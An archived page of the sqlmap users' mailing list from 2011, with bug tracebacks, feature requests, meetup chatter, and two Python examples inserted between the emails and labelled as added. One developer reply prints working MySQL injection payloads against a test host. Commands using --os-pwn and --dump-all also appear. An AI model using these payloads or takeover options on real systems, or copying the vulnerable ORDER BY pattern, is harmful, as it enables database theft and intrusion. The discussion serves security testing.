sqlmap-users Mailing List for sqlmap (Page 97)
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2011-04-28 07:08:37
It would be great if you could wireshark that ICMP traffic and show us what's happening. Thing is that we are really not aware of ICMP traffic in the normal case.

Kr

On Thursday, April 28, 2011, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Goce,
>
> On 24 April 2011 04:11, Goce Trenchev <amo...@gm...> wrote:
>> I've been doing some experiments with sqlmap and I found out that when I turn off ICMP so there is no ping reply from the target server, sqlmap is not working and it says connection timed out. It would be great if there were an option to treat the host as online and not ping it.
>
> sqlmap only uses ICMP packets when you take over the back-end DBMS server and choose to do it over an ICMP tunnel with the --os-pwn switch. Is this the case? If so, run sqlmap as root on Linux (needed in order to use Impacket and generate arbitrary ICMP echo responses) and, if the back-end DBMS runs on Windows and the OS/firewall allows ICMP echo requests to arbitrary targets (read: the sqlmap attacker Linux box), then the out-of-band channel will work.
> If this is not the case, please do a packet dump of your sqlmap run, run it with -t traffic.log and -v 3, and send us the full output and files in order to debug it further, please.
>
> Regards,
> Bernardo
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>
> ------------------------------------------------------------------------------
> WhatsUp Gold - Download Free Network Management Software
> The most intuitive, comprehensive, and cost-effective network management toolset available today. Delivers lowest initial acquisition cost and overall TCO of any competing solution.
> http://p.sf.net/sfu/whatsupgold-sd
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 00:00:00
Hi Goce,

On 24 April 2011 04:11, Goce Trenchev <amo...@gm...> wrote:
> I've been doing some experiments with sqlmap and I found out that when I turn off ICMP so there is no ping reply from the target server, sqlmap is not working and it says connection timed out. It would be great if there were an option to treat the host as online and not ping it.

sqlmap only uses ICMP packets when you take over the back-end DBMS server and choose to do it over an ICMP tunnel with the --os-pwn switch. Is this the case? If so, run sqlmap as root on Linux (needed in order to use Impacket and generate arbitrary ICMP echo responses) and, if the back-end DBMS runs on Windows and the OS/firewall allows ICMP echo requests to arbitrary targets (read: the sqlmap attacker Linux box), then the out-of-band channel will work.
If this is not the case, please do a packet dump of your sqlmap run, run it with -t traffic.log and -v 3, and send us the full output and files in order to debug it further, please.

Regards,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-27 23:54:12
Hi Jacco,

On 27 April 2011 10:52, Jacco van Tuijl <jac...@gm...> wrote:
> I've been writing an article about SQL injection in the ORDER BY clause:
> http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/
>
> Would be nice to see that implemented in version 1.0 :)

sqlmap has had support for injection in ORDER BY and GROUP BY clauses since 0.9-dev, for about 6 months or so now. Proof of concept:

--8<--
$ python sqlmap.py -u http://debiandev/sqlmap/mysql/get_int_orderby.php?id=1 --level 3 --flush-session

    sqlmap/1.0-dev (r3772) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:49:02

[00:49:02] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev/session' as session file
[00:49:02] [INFO] flushing session file
[00:49:02] [INFO] testing connection to the target url
[00:49:02] [INFO] heuristics detected web page charset 'ascii'
[00:49:02] [INFO] testing if the url is stable, wait a few seconds
[00:49:03] [INFO] url is stable
[00:49:03] [INFO] testing if GET parameter 'id' is dynamic
[00:49:03] [INFO] confirming that GET parameter 'id' is dynamic
[00:49:04] [INFO] GET parameter 'id' is dynamic
[00:49:04] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[00:49:04] [INFO] testing sql injection on GET parameter 'id'
[00:49:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace'
[00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[00:49:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[00:49:04] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[00:49:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[00:49:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' injectable
[00:49:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:49:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:49:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:49:54] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[00:49:55] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 193 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (6096=6096) THEN 1 ELSE 6096*(SELECT 6096 FROM information_schema.tables) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 3210 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,110,102,58),(SELECT (CASE WHEN (3210=3210) THEN 1 ELSE 0 END)),CHAR(58,104,103,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[00:50:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0

[00:50:00] [INFO] Fetched data logged to text files under '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev'

[*] shutting down at: 00:50:00
--8<--

As you can see it spotted three different SQL injection techniques against an ORDER BY clause injection point. The original query in the PHP page is:

--8<--
$query = "SELECT * FROM users ORDER BY " . $_GET['id'];
--8<--

Like I said, this has been tested thoroughly on MySQL and the other DBMSs too.

> I'm also interested in joining your dev. team.

We can discuss it privately, drop us an email to de...@sq....

Regards,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
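The PHP line Bernardo quotes glues the sort key straight into the query. As an added example (not code from this list or from sqlmap), the Python/sqlite3 snippet below shows the same defect, the common non-fix of binding the column name as a parameter, and the allow-list that is the only workable repair, since SQL identifiers cannot be parameterised. The table, columns and rows are constructed for the demo.

```python
import sqlite3

# Constructed schema and rows for the demo (not from the mailing list).
ROWS = [(3, "carol"), (1, "alice"), (2, "bob")]


def connect():
    """In-memory database with a users table like the one in the PHP page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def vulnerable_order_by(conn, user_input):
    """Same shape as  SELECT * FROM users ORDER BY $_GET['id']:
    whatever the caller passes is parsed by the DBMS as SQL, so any
    expression (CASE, subqueries, timing functions) is evaluated."""
    sql = "SELECT id, name FROM users ORDER BY " + user_input
    return conn.execute(sql).fetchall()


def bound_order_by(conn, user_input):
    """The non-fix: binding the sort key as a parameter. The placeholder
    becomes a string *literal*, so every row gets the same constant key and
    the clause never sorts by the column the caller asked for."""
    sql = "SELECT id, name FROM users ORDER BY ?"
    return conn.execute(sql, (user_input,)).fetchall()


# Identifiers the application itself owns; user input is mapped onto these.
ALLOWED_COLUMNS = {"id", "name"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def safe_order_by(conn, column, direction="ASC"):
    """Allow-list the column and direction, then build the clause only from
    those vetted strings. Anything not on the list is rejected outright."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError("unknown sort column: %r" % column)
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("unknown sort direction: %r" % direction)
    sql = "SELECT id, name FROM users ORDER BY %s %s" % (column, direction)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = connect()
    print(vulnerable_order_by(db, "length(name) DESC, id"))  # caller-chosen expression runs
    print(bound_order_by(db, "id"))                           # not sorted by id at all
    print(safe_order_by(db, "name", "desc"))                  # vetted clause only
```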
From: Jacco v. T. <jac...@gm...> - 2011-04-27 09:53:02
I've been writing an article about SQL injection in the ORDER BY clause:
http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/

Would be nice to see that implemented in version 1.0 :)

I'm also interested in joining your dev. team. Let me know what you think.

Many kind regards,
Jacco van Tuijl
From: Jacco v. T. <jac...@gm...> - 2011-04-27 09:49:26
[11:08:16] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 11 times, 500 (Internal Server Error) - 6103 times
[11:08:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3770)
Python version: 2.7.1
Operating system: nt
Command line: sqlmap.py -u ********************************************************************************* --dump-all --random-agent --proxy=http://127.0.0.1:8118 --check-payload
Technique: UNION
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 83, in main
    start()
  File "C:\sqlmap-0.9\lib\controller\controller.py", line 485, in start
    action()
  File "C:\sqlmap-0.9\lib\controller\action.py", line 106, in action
    conf.dbmsHandler.dumpAll()
  File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1525, in dumpAll
    data = self.dumpTable()
  File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1337, in dumpTable
    entries = zip(*[entries[colName] for colName in colList])
KeyError: u'Synonym'
From: Miroslav S. <mir...@gm...> - 2011-04-27 08:41:07
It's not that we expected such large log files, so everything is loaded into memory and processed. We can adapt and read line by line; the problem will be solved for sure but it would slow down the processing of the log files. Will do something regarding this later this week.

kr

On Tuesday, April 26, 2011, m4l1c3 <mal...@gm...> wrote:
> Target login page is like: Type a number into a field, a login appears. I log in, and spider with burpsuite. 250mb log file (too much?)
>
> sqlmap version: 1.0-dev (r3770)
> Python version: 2.5.2
> Operating system: posix
> Command line: ./sqlmap.py -l /stough/log --batch --dbs
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 75, in main
>     init(cmdLineOptions)
>   File "/pentest/database/sqlmap-dev/lib/core/option.py", line 1600, in init
>     __setMultipleTargets()
>   File "/pentest/database/sqlmap-dev/lib/core/option.py", line 332, in __setMultipleTargets
>     __feedTargetsDict(conf.list, addedTargetUrls)
>   File "/pentest/database/sqlmap-dev/lib/core/option.py", line 296, in __feedTargetsDict
>     content = content.replace("\r", "")
> MemoryError
>
>

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
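Miroslav's point is that the whole Burp log is read into one string before `content.replace("\r", "")` runs, which is what raised MemoryError on a 250mb file. As an added example, not sqlmap's own code, here is a generator that walks a log line by line so peak memory is one entry rather than the file; the entry framing (a line of `=`, a timestamp plus base URL, another `=` line, then the raw request) and the sample log are assumed and constructed for the demo, so check them against a real capture.

```python
import os
import tempfile

# Assumed entry framing (constructed for this demo; verify against a real log):
#   <separator line of '='>
#   <timestamp>  <scheme://host:port>
#   <separator line of '='>
#   <raw HTTP request, optionally with a body>
#   ... the next separator closes this entry and opens the next one
SEPARATOR = "=" * 54

# Constructed sample with CRLF endings, the case the old whole-file replace("\r", "") handled.
SAMPLE_LOG = "\r\n".join([
    SEPARATOR,
    "10:45:09 PM  http://example.test:80",
    SEPARATOR,
    "GET /login.php?id=1 HTTP/1.1",
    "Host: example.test",
    "",
    SEPARATOR,
    "10:45:10 PM  http://example.test:80",
    SEPARATOR,
    "POST /login.php HTTP/1.1",
    "Host: example.test",
    "Content-Type: application/x-www-form-urlencoded",
    "",
    "id=2",
    SEPARATOR,
    "",
])


def iter_log_entries(path, encoding="utf-8"):
    """Yield (base_url, raw_request) per entry, reading one line at a time.
    Stripping the line terminator per line replaces the whole-file
    content.replace("\\r", ""); only the current entry is ever held."""
    state, url, body = "seek", None, []
    with open(path, "r", encoding=encoding, errors="replace", newline="") as fh:
        for line in fh:
            line = line.rstrip("\r\n")
            if line.startswith("===="):
                if state == "body":            # separator closes the current entry
                    yield url, "\n".join(body)
                    url, body = None, []
                state = "body" if state == "meta" else "header"
                continue
            if state == "header" and line.strip():   # "<time>  <base url>"
                url = line.split()[-1]
                state = "meta"
            elif state == "body":
                body.append(line)
    if state == "body" and url is not None:        # log without a trailing separator
        yield url, "\n".join(body)


def collect_targets(path):
    """Turn each entry into (method, full_url, post_data) without holding
    more than one entry in memory at a time."""
    targets = []
    for base_url, raw in iter_log_entries(path):
        head, _, data = raw.partition("\n\n")      # headers / body split
        parts = head.split("\n", 1)[0].split()    # request line
        if len(parts) < 2:
            continue
        targets.append((parts[0], base_url + parts[1], data.strip()))
    return targets


def write_sample_log():
    """Write the constructed SAMPLE_LOG to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".log")
    with os.fdopen(fd, "wb") as fh:
        fh.write(SAMPLE_LOG.encode("utf-8"))
    return path


if __name__ == "__main__":
    log_path = write_sample_log()
    for method, url, data in collect_targets(log_path):
        print(method, url, data or "-")
    os.unlink(log_path)
```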
From: m4l1c3 <mal...@gm...> - 2011-04-26 14:16:13
Target login page is like: Type a number into a field, a login appears. I log in, and spider with burpsuite. 250mb log file (too much?)

sqlmap version: 1.0-dev (r3770)
Python version: 2.5.2
Operating system: posix
Command line: ./sqlmap.py -l /stough/log --batch --dbs
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 75, in main
    init(cmdLineOptions)
  File "/pentest/database/sqlmap-dev/lib/core/option.py", line 1600, in init
    __setMultipleTargets()
  File "/pentest/database/sqlmap-dev/lib/core/option.py", line 332, in __setMultipleTargets
    __feedTargetsDict(conf.list, addedTargetUrls)
  File "/pentest/database/sqlmap-dev/lib/core/option.py", line 296, in __feedTargetsDict
    content = content.replace("\r", "")
MemoryError
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-26 08:08:27
Thank you guys for your donations. We will drink for you tonight! Hope to see someone joining us, drinks are on us and remember that the pub has a good deal for wine bottles on Tuesdays ;)

Cheers,
Bernardo Damele A. G.

This message was sent from a smartphone

On 25 Apr 2011, at 19:24, "ja...@ev..." <ja...@ev...> wrote:
> Well, I'm trying to get my buddy Bert to go buy them a pint on me. We'll see if he actually does it.
>
> On Mon, 25 Apr 2011 14:09:31 -0400 (EDT), Ryan Sears <rd...@mt...> wrote:
>> Which is exactly why I donated to SQLMap last night :). I suggest you do the same, because like you said - they freakin made SQLMap!
>>
>> Ryan
>>
>> ----- Original Message -----
>> From: ja...@ev...
>> To: sql...@li...
>> Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern
>> Subject: Re: [sqlmap-users] meet up in London
>>
>> Not even one person? You guys are dicks.
>> Buy them some pints, they made sqlmap!
>>
>> -james
>>
>> On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham <ste...@gm...> wrote:
>>> Miroslav Stampar wrote:
>>>> So nobody is willing to have a drink with us :(
>>>> We are both in London a few more days so if you change your mind just reply.
>>>>
>>>> Kr
>>>
>>> If it makes you feel better, if I was single and didn't have to justify the cost of the plane ticket from the US, I'd totally be there ;-)
From: David G. <sk...@gm...> - 2011-04-26 03:01:04
How about a --count switch? To count the number of rows (like sqlsus does)... and what about a column enumerator without setting some table (-T) or DB (-D)?

David
From: <ja...@ev...> - 2011-04-25 18:23:45
Well, I'm trying to get my buddy Bert to go buy them a pint on me. We'll see if he actually does it.

On Mon, 25 Apr 2011 14:09:31 -0400 (EDT), Ryan Sears <rd...@mt...> wrote:
> Which is exactly why I donated to SQLMap last night :). I suggest you do the same, because like you said - they freakin made SQLMap!
>
> Ryan
>
> ----- Original Message -----
> From: ja...@ev...
> To: sql...@li...
> Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern
> Subject: Re: [sqlmap-users] meet up in London
>
> Not even one person? You guys are dicks.
> Buy them some pints, they made sqlmap!
>
> -james
>
> On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham <ste...@gm...> wrote:
>> Miroslav Stampar wrote:
>>> So nobody is willing to have a drink with us :(
>>> We are both in London a few more days so if you change your mind just reply.
>>>
>>> Kr
>>
>> If it makes you feel better, if I was single and didn't have to justify the cost of the plane ticket from the US, I'd totally be there ;-)
From: Ryan S. <rd...@mt...> - 2011-04-25 18:09:39
Which is exactly why I donated to SQLMap last night :). I suggest you do the same, because like you said - they freakin made SQLMap!

Ryan

----- Original Message -----
From: ja...@ev...
To: sql...@li...
Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern
Subject: Re: [sqlmap-users] meet up in London

Not even one person? You guys are dicks.
Buy them some pints, they made sqlmap!

-james

On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham <ste...@gm...> wrote:
> Miroslav Stampar wrote:
>> So nobody is willing to have a drink with us :(
>> We are both in London a few more days so if you change your mind just reply.
>>
>> Kr
>
> If it makes you feel better, if I was single and didn't have to justify the cost of the plane ticket from the US, I'd totally be there ;-)
From: <ja...@ev...> - 2011-04-25 18:07:57
Not even one person? You guys are dicks.
Buy them some pints, they made sqlmap!

-james

On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham <ste...@gm...> wrote:
> Miroslav Stampar wrote:
>> So nobody is willing to have a drink with us :(
>> We are both in London a few more days so if you change your mind just reply.
>>
>> Kr
>
> If it makes you feel better, if I was single and didn't have to justify the cost of the plane ticket from the US, I'd totally be there ;-)
From: Steven P. <ste...@gm...> - 2011-04-25 15:46:02
Miroslav Stampar wrote:
> So nobody is willing to have a drink with us :(
> We are both in London a few more days so if you change your mind just reply.
>
> Kr

If it makes you feel better, if I was single and didn't have to justify the cost of the plane ticket from the US, I'd totally be there ;-)

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com        |
| GPG public key ID CD31CAFB          |
From: Miroslav S. <mir...@gm...> - 2011-04-25 09:14:55
So nobody is willing to have a drink with us :(
We are both in London a few more days so if you change your mind just reply.

Kr

On Monday, April 4, 2011, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi,
>
> Miroslav will be in London later this month and we are thinking about having a sqlmap users' meet up down town.
> The possible date is Tuesday 26th (a w/ after InfoSec marketing/sales blokes' gathering) from 8:00pm @ The Phoenix[1] located at 37 Cavendish Square, W1G0PP, London, UK. See the map here[2].
>
> To tease the alcoholics.. and I bet there're a lot of drunken kiddies in here ;) ..From the pub's homepage:
> """
> EVERY TUESDAY
> Wine Night From 6pm
> Just because we love you, we decided to bring you something a little special on a Tuesday night!
>
> After 6pm ALL of our wine is reduced!
> Any bottle under £14 is just £7.95 &
> Any bottle over £14 is just £11.95
> So leave the 'house' at home and try something new!
> All our bar staff will be more than happy to recommend something, they're nice like that!
> """
>
> [1] http://www.phoenixcavendishsquare.co.uk/
> [2] http://bit.ly/f6ZLcg (same pub of DC4420, yeah!)
>
> Look forward to seeing you around!
>
> Cheers,
> Bernardo
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>
> ------------------------------------------------------------------------------
> Create and publish websites with WebMatrix
> Use the most popular FREE web apps or write code yourself; WebMatrix provides all the features you need to develop and publish your website. http://p.sf.net/sfu/ms-webmatrix-sf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-04-25 09:08:08
Hi Tom. I believe I see the connection with our code. Those number ranges have their root in the program's logic. Will be fixed in a week. After that hackers will be able to dump all :) It's just strange that nobody has noticed this in some two weeks, as that's the time of the affecting commit.

Kr

On Sunday, April 24, 2011, Tom Thumb <k1...@li...> wrote:
> When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why.
> Can anyone explain this behaviour?
> Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retrieve the rest of the data...
> Test subject is an MSSQL 2005 Database running on Windows 2003.

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-04-25 08:58:12
Hi Ahmed. Thanks for reporting. This will be fixed at the end of the week. It requires overwriting of some poorly written system methods. Sending from Bernardo's place in London :)

KR

On Monday, April 25, 2011, Bernardo Damele A. G. <ber...@gm...> wrote:
> What is the language of the web application? Can you provide us privately with full output of -v 3 --flush-session please?
>
> Bernardo
>
> On 25 April 2011 09:31, Ahmed Shawky <ah...@is...> wrote:
>> it based uploading shell with the latest revision (r3770) but here is another issue
>> [10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev (r3770)
>> Python version: 2.7
>> Operating system: posix
>> Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
>> Technique: UNION
>> Back-end DBMS: MySQL (fingerprinted)
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 83, in main
>>     start()
>>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
>>     action()
>>   File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
>>     conf.dbmsHandler.osPwn()
>>   File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in osPwn
>>     self.uploadShellcodeexec(web=web)
>>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in uploadShellcodeexec
>>     self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
>>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
>>     retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
>>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
>>     page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
>>   File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
>>     conn = multipartOpener.open(url, multipart)
>>   File "/usr/lib/python2.7/urllib2.py", line 391, in open
>>     response = self._open(req, data)
>>   File "/usr/lib/python2.7/urllib2.py", line 409, in _open
>>     '_open', req)
>>   File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
>>     result = func(*args)
>>   File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
>>     return self.do_open(httplib.HTTPConnection, req)
>>   File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
>>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>>   File "/usr/lib/python2.7/httplib.py", line 946, in request
>>     self._send_request(method, url, body, headers)
>>   File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
>>     self.endheaders(body)
>>   File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
>>     self._send_output(message_body)
>>   File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
>>     msg += message_body
>> UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: ordinal not in range(128)
>> [*] shutting down at: 10:30:07
>>
>> On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote:
>>> there is an issue when sqlmap comes to shell upload via os-shell or os-pwn
>>> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry your run with the latest development version from the Subversion repository.
>>> If the exception persists, please send by e
>> ------------------------------------------------------------------------------
>> Fulfilling the Lean Software Promise
>> Lean software platforms are now widely adopted and the benefits have been demonstrated beyond question. Learn why your peers are replacing JEE containers with lightweight application servers - and what you can gain from the move. http://p.sf.net/sfu/vmware-sfemails
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-25 08:37:08
What is the language of the web application? Can you provide us privately with full output of -v 3 --flush-session please?

Bernardo

On 25 April 2011 09:31, Ahmed Shawky <ah...@is...> wrote:
> it based uploading shell with the latest revision (r3770) but here is another issue
> [10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r3770)
> Python version: 2.7
> Operating system: posix
> Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
>     action()
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
>     conf.dbmsHandler.osPwn()
>   File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in osPwn
>     self.uploadShellcodeexec(web=web)
>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in uploadShellcodeexec
>     self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
>     retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
>     page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
>   File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
>     conn = multipartOpener.open(url, multipart)
>   File "/usr/lib/python2.7/urllib2.py", line 391, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.7/urllib2.py", line 409, in _open
>     '_open', req)
>   File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>   File "/usr/lib/python2.7/httplib.py", line 946, in request
>     self._send_request(method, url, body, headers)
>   File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
>     self.endheaders(body)
>   File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
>     self._send_output(message_body)
>   File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
>     msg += message_body
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: ordinal not in range(128)
> [*] shutting down at: 10:30:07
>
> On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote:
>> there is an issue when sqlmap comes to shell upload via os-shell or os-pwn
>> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev (r3767)
>> Python version: 2.7
>> Operating system: posix
>> Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
>> Technique: UNION
>> Back-end DBMS: MySQL (fingerprinted)
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 83, in main
>>     start()
